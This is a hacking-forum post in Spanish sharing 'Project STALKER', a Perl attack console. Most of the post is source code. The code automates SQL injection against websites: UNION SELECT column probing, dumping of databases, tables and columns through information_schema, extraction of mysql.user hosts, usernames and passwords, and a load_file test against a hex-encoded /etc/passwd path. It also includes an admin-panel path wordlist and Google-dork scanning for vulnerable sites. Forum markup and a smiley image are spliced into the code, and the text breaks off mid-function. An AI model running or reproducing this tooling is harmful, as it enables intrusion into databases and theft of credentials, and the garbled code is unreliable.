[Perl] Project STALKER

  • 0 Respuestas
  • 1875 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil

[Perl] Project STALKER

  • en: Agosto 19, 2011, 11:30:36 pm
Bueno esta es la nueva version de la consola que eh estado haciendo en perl con las siguiente funciones

  • Mejoras [/li]

    [++] Diseño
    [++] Repare algunos bugs
    [++] Mejor manejo con control+c
    [++] Agregue un cliente mysql

  • Opciones[/li]

    [++] Reconocer ip de un host
    [++] Capturar todos los links de una pagina
    [++] Tener una lista de todos los procesos de windows con posibilidad de cerrar el que queramos
    [++] Cliente mediante sockets
    [++] Reconocer los metodos HTTP en una web
    [++] Captura links y busca posibles paths para listado de directorios
    [++] Encode/decode para base64,hex,ascii
    [++] Scanner Port
    [++] Busca panel de admin
    [++] k0bra incorporado (Scanner SQLI)
    [++] Cliente FTP
    [++] Navegador de archivos con posibilidad de borrar,renombrar archivos o directorios
    [++] Scan Google para buscar paginas vulnerables a SQLI

    El codigo es el siguiente

    Código: Perl
    1. #!usr/bin/perl
    2. #Project STALKER (C) Doddy Hackman 2011
    3. #
    4. #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
    5. #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
    6. #
    7. #You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
    8. #
    9.  
    10. use IO::Socket;  
    11. use HTML::LinkExtor;
    12. use LWP::UserAgent;
    13. use Win32::OLE qw(in);
    14. use Win32::Process;
    15. use Net::FTP;
    16. use Cwd;
    17. use URI::Split qw(uri_split);
    18. use MIME::Base64;
    19. use DBI;
    20. use Color::Output;
    21. Color::Output::Init
    22.  
    23. @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
    24. ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
    25. ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
    26. ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
    27. ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
    28. ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
    29. ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
    30. ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
    31. ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
    32. ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
    33. ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
    34. ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
    35. ,'administration/','administration/index.php','administration/login.php'
    36. ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
    37. ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
    38. ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
    39. ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
    40. ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
    41. ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
    42. ,'administrator/','administrator/index.html','administrator/login.html'
    43. ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
    44. ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
    45. ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
    46. ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
    47. ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
    48. ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
    49. ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
    50. ,'administrator/login.asp','administrator/account.asp','administrator.asp'
    51. ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
    52. ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
    53. ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
    54. ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
    55. ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
    56. ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
    57. ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
    58. ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
    59. ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
    60. ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
    61. ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
    62. ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
    63. ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
    64. ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
    65. ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
    66. ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
    67. ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
    68. ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
    69. ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
    70. ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
    71. ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
    72. ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
    73. ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
    74. ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
    75. ,'server/','database_administration/','power_user/','system_administration/'
    76. ,'ss_vms_admin_sm/');
    77.  
    78.  
    79. unless (-d "/logs/webs") {
    80. mkdir("logs/",777);
    81. mkdir("logs/webs/",777);
    82. }
    83.  
    84. my $nave = LWP::UserAgent->new;
    85. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
    86. $nave->timeout(5);
    87.  
    88. head();
    89.  
    90. getinfo();
    91.  
    92. $SIG{INT} = \&next;
    93.  
    94. while(1) {
    95. cprint "\x037"; #13
    96. menujo();
    97. cprint "\x030";
    98. }
    99.  
    100. sub getinfo {
    101. $so = $^O;
    102. $login = Win32::LoginName();
    103. $domain = Win32::DomainName();
    104. cprint "\x0313"; #13
    105. print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
    106. cprint "\x030";
    107. }
    108.  
    109.  
    110. sub menujo {
    111. print "\n\n>";
    112. chomp (my $cmd = <stdin>);
    113. print "\n\n";
    114.  
    115. if ($cmd=~/getinfo/ig) {
    116. getinfo();
    117. }
    118. elsif ($cmd =~/getip (.*)/) {
    119. my $te = $1;
    120. if ($te eq "" or $te eq " ") {
    121. print "\n</li><li type="square"> sintax : getip <host>\n";[/li][/list]
    122. }
    123. print "\n[IP] : ".getip($1)."\n";
    124. print "\n";
    125. }
    126.  
    127. elsif ($cmd =~/getlink (.*)/) {
    128. print "</li><li type="square"> Extracting links in the page\n\n\n";[/li][/list]
    129. $code = toma($1);
    130. my @re = get_links($code);
    131. for my $url(@re) {
    132. chomp $url;
    133. print "[Link] : $url\n";
    134. }
    135. print "\n\n</li><li type="square"> Finish\n";[/li][/list]
    136. }
    137.  
    138. elsif ($cmd=~/help/) {
    139. helpme();
    140. }
    141.  
    142. elsif ($cmd=~/getprocess/) {
    143. my %re = getprocess();
    144.  
    145.  
    146. for my $data(keys %re) {
    147. ($proceso,$pid) = ($t=~/(.*)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.*)/ig);
    148. print "</li><li type="square"> Proceso : ".$data."\n";[/li][/list]
    149. print "</li><li type="square"> PID : ".$re{$data}."\n\n";[/li][/list]
    150. }
    151. }
    152. elsif ($cmd=~/killprocess (.*) (.*)/) {
    153. if (killprocess($1,$2)) {
    154. print "</li><li type="square"> Process $1 closed";[/li][/list]
    155. }
    156. }
    157. elsif ($cmd=~/conec (.*) (.*) (.*)/) {
    158. print conectar($1,$2,$3);
    159. }
    160. elsif ($cmd=~/allow (.*)/) {
    161. $re = conectar($1,"80","GET / HTTP/1.0\r\n");
    162. if ($re=~/Allow:(.*)/ig) {
    163. print "</li><li type="square"> Metodos : ".$1."\n";[/li][/list]
    164. }}
    165. elsif ($cmd=~/paths (.*)/) {
    166. scanpaths($1);
    167. }
    168. elsif ($cmd=~/encodehex (.*)/) {
    169. print "\n\n</li><li type="square"> ".hex_en($1)."\n\n";[/li][/list]
    170. }
    171. elsif ($cmd=~/decodehex (.*)/) {
    172. print "\n\n</li><li type="square"> ".hex_de($1)."\n\n";[/li][/list]
    173. }
    174. elsif ($cmd=~/download (.*) (.*)/) {
    175. my $file,$name = $1,$2;
    176. if (download($1,$2)) {
    177. print "</li><li type="square"> File downloaded\n";[/li][/list]
    178. }
    179. }
    180. elsif ($cmd=~/encodeascii (.*)/) {
    181. print "\n\n</li><li type="square"> ".ascii($1)."\n\n";[/li][/list]
    182. }
    183. elsif ($cmd=~/decodeascii (.*)/) {
    184. print "\n\n</li><li type="square"> ".ascii_de($1)."\n\n";[/li][/list]
    185. }
    186. elsif ($cmd=~/encodebase (.*)/) {
    187. print "\n\n</li><li type="square"> ".base($1)."\n\n";[/li][/list]
    188. }
    189. elsif ($cmd=~/decodebase (.*)/) {
    190. print "\n\n</li><li type="square"> ".base_de($1)."\n\n";[/li][/list]
    191. }
    192. elsif ($cmd=~/aboutme/) {
    193. aboutme();
    194. }
    195. elsif ($cmd=~/scanport (.*)/) {
    196. scanport($1);
    197. }
    198. elsif ($cmd=~/panel (.*)/) {
    199. scanpanel($1);
    200. }
    201. elsif ($cmd=~/scangoogle/) {
    202. print "[Dork] : ";
    203. chomp(my $dork = <stdin>);
    204. print "\n\n[Pages] : ";
    205. chomp(my $pages = <stdin>);
    206. print "\n\n[Starting the search]\n\n";
    207. my @links = google($dork,$pages);
    208. print "\n[Links Found] : ".int(@links)."\n\n\n";
    209. print "[Starting the scan]\n\n\n";
    210. for my $link(@links) {
    211. if ($link=~/(.*)=/ig) {
    212. my $web = $1;
    213. sql($web."=");
    214. }}
    215. print "\n\n</li><li type="square"> Finish\n";[/li][/list]
    216. }
    217. elsif ($cmd=~/getpass (.*)/) {
    218. crackit($1);
    219. }
    220. elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
    221. ftp($1,$2,$3);
    222. }
    223. elsif ($cmd=~/navegator/) {
    224. nave:
    225. print getcwd().">";
    226. chomp(my $rta = <stdin>);
    227. print "\n\n";
    228. if ($rta=~/list/) {
    229. my @files = coleccionar(getcwd());
    230. for(@files) {
    231. if (-f $_) {
    232. print "[File] : ".$_."\n";
    233. } else {
    234. print "[Directory] : ".$_."\n";
    235. }}}
    236. if ($rta=~/cd (.*)/) {
    237. my $dir = $1;
    238. if (chdir($dir)) {
    239. print "\n</li><li type="square"> Directory changed\n";[/li][/list]
    240. } else {
    241. print "\n[-] Error\n";
    242. }}
    243. if ($rta=~/del (.*)/) {
    244. my $file = getcwd()."/".$1;
    245. if (-f $file) {
    246. if (unlink($file)) {
    247. print "\n</li><li type="square"> File Deleted\n";[/li][/list]
    248. } else {
    249. print "\n[-] Error\n";
    250. }
    251. } else {
    252. if (rmdir($file)) {
    253. print "\n</li><li type="square"> Directory Deleted\n";[/li][/list]
    254. } else {
    255. print "\n[-] Error\n";
    256. }}}
    257. if ($rta=~/rename (.*) (.*)/) {
    258. if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
    259. print "\n</li><li type="square"> File Changed\n";[/li][/list]
    260. } else {
    261. print "\n[-] Error\n";
    262. }}
    263. if ($rta=~/open (.*)/) {
    264. my $file = $1;
    265. chomp $file;
    266. system($file);
    267. #system(getcwd()."/".$file);
    268. }
    269. if ($rta=~/help/) {
    270. print "\nCommands : help cd list del rename open exit\n\n";
    271. }
    272. if ($rta=~/exit/) {
    273. next;
    274. }
    275. print "\n\n";
    276. goto nave;
    277. }
    278. elsif ($cmd=~/kobra (.*)/) {
    279. my $url = $1;
    280. chomp $url;
    281. scansqli($url,"--");
    282. }
    283. elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
    284. enter($1,$2,$3);
    285. }
    286. elsif ($cmd=~/exit/) {
    287. copyright();
    288. <stdin>;
    289. exit(1);
    290. }
    291. else {
    292. system($cmd);
    293. }
    294. #print "\n\n";
    295. }
    296.  
    297.  
    298. sub scansqli {
    299. print "[Status] : Scanning.....\n";
    300. $pass = &bypass($_[1]);
    301. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    302. my $save = $auth;
    303. if ($_[0]=~/hackman/ig) {
    304. savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
    305. &menu_options($_[0],$pass,$save);
    306. }
    307. my ($gen,$save,$control) = &length($_[0],$_[1]);
    308. if ($control eq 1) {
    309. print "[Status] : Enjoy the menu\n\n";
    310. &menu_options($gen,$pass,$save);
    311. } else {
    312. print $control;
    313. print "[Status] : Length columns not found\n\n";
    314. menujo();
    315. }
    316. }
    317.  
    318. sub length {
    319. my $rows  = "0";
    320. my $asc;
    321. my $page = $_[0];
    322. ($pass1,$pass2) = &bypass($_[1]);
    323. $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
    324. $code = toma($inyection);
    325. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
    326. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
    327. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
    328. unless ($testar1 eq $testar2) {
    329. my $patha = $1;
    330. chomp $patha;
    331. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
    332. $total = "1";
    333. for my $rows(2..200) {
    334. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
    335. $total.= ",".$rows;
    336. $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
    337. $test = toma($injection);
    338. if ($test=~/RATSXPDOWN/) {
    339. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
    340. $control = 1;
    341. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    342. my $save = $auth;
    343. savefile($save.".txt","\n[Target confirmed] : $page");
    344. savefile($save.".txt","[Bypass] : $_[1]\n");
    345. savefile($save.".txt","[Limit] : The site has $rows columns");
    346. savefile($save.".txt","[Data] : The number @number print data");
    347. if ($patha) {
    348. savefile($save.".txt","[Full Path Discloure] : $patha");
    349. }
    350. $total=~s/$number[0]/hackman/;
    351. savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
    352. return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
    353. }}}}}
    354.  
    355.  
    356. sub details {
    357. my ($page,$bypass,$save) = @_;
    358. ($pass1,$pass2) = &bypass($bypass);
    359. savefile($save.".txt","\n");
    360. if ($page=~/(.*)hackman(.*)/ig) {
    361. print "\n\n</li><li type="square"> Searching information..\n\n"; [/li][/list]
    362. my  ($start,$end) = ($1,$2);
    363. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
    364. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
    365. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    366. $test1 = toma($inforschema);
    367. $test2 = toma($mysqluser);
    368. if ($test2=~/ERTOR854/ig) {
    369. savefile($save.".txt","[mysql.user] : ON");
    370. print "[mysql.user] : ON\n";
    371. } else {
    372. print "[mysql.user] : OFF\n";
    373. savefile($save.".txt","[mysql.user] : OFF");
    374. }
    375. if ($test1=~/ERTOR854/ig) {
    376. print "[information_schema.tables] : ON\n";
    377. savefile($save.".txt","[information_schema.tables] : ON");
    378. } else {
    379. print "[information_schema.tables] : OFF\n";
    380. savefile($save.".txt","[information_schema.tables] : OFF");
    381. }
    382. if ($test3=~/ERTOR854/ig) {
    383. print "</li><li type="square"> load_file permite ver los archivos\n";[/li][/list]
    384. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    385. }
    386. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
    387. $injection = $start.$concat.$end.$pass2;
    388. $code = toma($injection);
    389. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
    390. print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
    391. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
    392. } else {
    393. print "\n[-] Not found any data\n";
    394. }}}
    395.  
    396.  
    397. sub menu_options {
    398.  
    399. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    400. my $save = $auth;
    401. print "\n/logs/webs/$save>";
    402. chomp (my $rta = <stdin>);
    403.  
    404. if ($rta=~/help/) {
    405.  
    406. commands : details tables columns dbs othertable othercolumn
    407.            mysqluser dumper logs exit
    408.  
    409. );
    410. }
    411.  
    412.  
    413. if ($rta =~/tables/) {
    414. schematables($_[0],$_[1],$save);
    415. &reload;  
    416. }
    417. elsif ($rta =~/columns (.*)/) {
    418. my $tabla = $1;
    419. schemacolumns($_[0],$_[1],$save,$tabla);
    420. &reload;
    421. }
    422. elsif ($rta =~/dbs/) {
    423. &schemadb($_[0],$_[1],$save);
    424. &reload;
    425. }
    426. elsif ($rta =~/othertable (.*)/) {
    427. my $data = $1;
    428. &schematablesdb($_[0],$_[1],$data,$save);
    429. &reload;
    430. }
    431. elsif ($rta =~/othercolumn (.*) (.*)/){
    432. my ($db,$table) = ($1,$2);
    433. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
    434. &reload;
    435. }
    436. elsif ($rta =~/mysqluser/) {
    437. &mysqluser($_[0],$_[1],$save);
    438. &reload;
    439. }
    440. elsif ($rta=~/logs/) {
    441. $t = "logs/webs/$save.txt";
    442. system("start $t");
    443. &reload;
    444. }
    445. elsif ($rta=~/exit/) {
    446. next;
    447. }
    448.  
    449. elsif ($rta=~/dumper (.*) (.*) (.*)/) {
    450. my ($tabla,$col1,$col2) = ($1,$2,$3);
    451. &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
    452. &reload;
    453. }
    454. elsif ($rta =~/details/) {
    455. &details($_[0],$_[1],$save);
    456. &reload;
    457. }
    458. else {
    459. &reload;
    460. }
    461. }
    462.  
    463.  
    464.  
    465. sub schematables {
    466. $real = "1";
    467. my ($page,$bypass,$save) = @_;
    468. savefile($save.".txt","\n");
    469. print "\n";
    470. my $page1 = $page;
    471. ($pass1,$pass2) = &bypass($_[1]);
    472. savefile($save.".txt","[DB] : default");
    473. print "\n</li><li type="square"> Searching tables with schema\n\n";[/li][/list]
    474. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    475. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    476. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
    477. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    478. my $resto = $1;
    479. $total = $resto - 17;
    480. print "</li><li type="square"> Tables Length :  $total\n\n";[/li][/list]
    481. savefile($save.".txt","</li><li type="square"> Searching tables with schema\n");[/li][/list]
    482. savefile($save.".txt","</li><li type="square"> Tables Length :  $total\n");[/li][/list]
    483. my $limit = $1;
    484. for my $limit(17..$limit) {
    485. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
    486. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    487. my $table = $1;
    488. chomp $table;
    489. print "[Table $real Found : $table ]\n";
    490. savefile($save.".txt","[Table $real Found : $table ]");
    491. $real++;
    492. }}
    493. print "\n";
    494. } else {
    495. print "\n[-] information_schema = ERROR\n";
    496. }    
    497. }
    498.  
    499. sub reload {
    500. &menu_options($_[0]);
    501. }
    502.  
    503.  
    504. sub schemacolumns {
    505. my ($page,$bypass,$save,$table) = @_;
    506. my $page3 = $page;
    507. my $page4 = $page;
    508. savefile($save.".txt","\n");
    509. print "\n";
    510. ($pass1,$pass2) = &bypass($bypass);
    511. print "\n[DB] : default\n";
    512. savefile($save.".txt","[DB] : default");
    513. savefile($save.".txt","[Table] : $table\n");
    514. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    515. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
    516. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    517. print "\n[Columns Length : $1 ]\n\n";
    518. savefile($save.".txt","[Columns Length : $1 ]\n");
    519. my $si = $1;
    520. chomp $si;
    521. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    522. $real = "1";
    523. for my $limit2(0..$si) {
    524. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
    525. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    526. print "[Column $real] : $1\n";
    527. savefile($save.".txt","[Column $real] : $1");
    528. $real++;
    529. }}
    530. print "\n";
    531. } else {
    532. print "\n[-] information_schema = ERROR\n";
    533. }}
    534.  
    535. sub schemadb {
    536. my ($page,$bypass,$save) = @_;
    537. my $page1 = $page;
    538. savefile($save.".txt","\n");
    539. print "\n\n</li><li type="square"> Searching DBS\n\n";[/li][/list]
    540. ($pass1,$pass2) = &bypass($bypass);
    541. $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    542. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
    543. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    544. my $limita = $1;
    545. print "</li><li type="square"> Databases Length : $limita\n\n";[/li][/list]
    546. savefile($save.".txt","</li><li type="square"> Databases Length : $limita\n");[/li][/list]
    547. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    548. $real = "1";
    549. for my $limit(0..$limita) {
    550. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
    551. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    552. my $control = $1;
    553. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
    554. print "[Database $real Found] $control\n";
    555. savefile($save.".txt","[Database $real Found] : $control");
    556. $real++;
    557. }
    558. }
    559. }
    560. print "\n";
    561. } else {
    562. print "[-] information_schema = ERROR\n";
    563. }
    564. }
    565.  
    566. sub schematablesdb {
    567. my $page = $_[0];
    568. my $db = $_[2];
    569. my $page1 = $page;
    570. savefile($_[3].".txt","\n");
    571. print "\n\n</li><li type="square"> Searching tables with DB $db\n\n";[/li][/list]
    572. ($pass1,$pass2) = &bypass($_[1]);
    573. savefile($_[3].".txt","[DB] : $db");
    574. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    575. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    576. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
    577. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
    578. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
    579. print "</li><li type="square"> Tables Length :  $1\n\n";[/li][/list]
    580. savefile($_[3].".txt","</li><li type="square"> Tables Length :  $1\n");[/li][/list]
    581. my $limit = $1;
    582. $real = "1";
    583. for my $lim(0..$limit) {
    584. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
    585. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
    586. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    587. my $table = $1;
    588. chomp $table;
    589. savefile($_[3].".txt","[Table $real Found : $table ]");
    590. print "[Table $real Found : $table ]\n";
    591. $real++;
    592. }}
    593. print "\n";  
    594. } else {
    595. print "\n[-] information_schema = ERROR\n";
    596. }}
    597.  
    598. sub schemacolumnsdb {
    599. my ($page,$bypass,$db,$table,$save) = @_;
    600. my $page3 = $page;
    601. my $page4 = $page;
    602. print "\n\n</li><li type="square"> Searching columns in table $table with DB $db\n\n";[/li][/list]
    603. savefile($save.".txt","\n");
    604. ($pass1,$pass2) = &bypass($_[1]);
    605. savefile($save.".txt","\n[DB] : $db");
    606. savefile($save.".txt","[Table] : $table");
    607. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    608. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
    609. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    610. print "\n[Columns length : $1 ]\n\n";
    611. savefile($save.".txt","[Columns length : $1 ]\n");
    612. my $si = $1;
    613. chomp $si;
    614. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    615. $real = "1";
    616. for my $limit2(0..$si) {
    617. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
    618. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    619. print "[Column $real] : $1\n";
    620. savefile($save.".txt","[Column $real] : $1");
    621. $real++;
    622. }
    623. }
    624. } else {
    625. print "\n[-] information_schema = ERROR\n";
    626. }
    627. print "\n";
    628. }
    629.  
    630. sub mysqluser {
    631. my ($page,$bypass,$save) = @_;
    632. my $cop = $page;
    633. my $cop1 = $page;
    634. savefile($save.".txt","\n");
    635. print "\n\n</li><li type="square"> Finding mysql.users\n";[/li][/list]
    636. ($pass1,$pass2) = &bypass($bypass);
    637. $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
    638. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
    639. if ($code=~/RATSXPDOWN/ig){
    640. $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    641. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
    642. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    643. print "\n</li><li type="square"> Users Found : $1\n\n";[/li][/list]
    644. savefile($save.".txt","\n</li><li type="square"> Users mysql Found : $1\n");[/li][/list]
    645. for my $limit(0..$1) {
    646. $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
    647. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
    648. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
    649. print "[Host] : $1 [User] : $2 [Password] : $3\n";
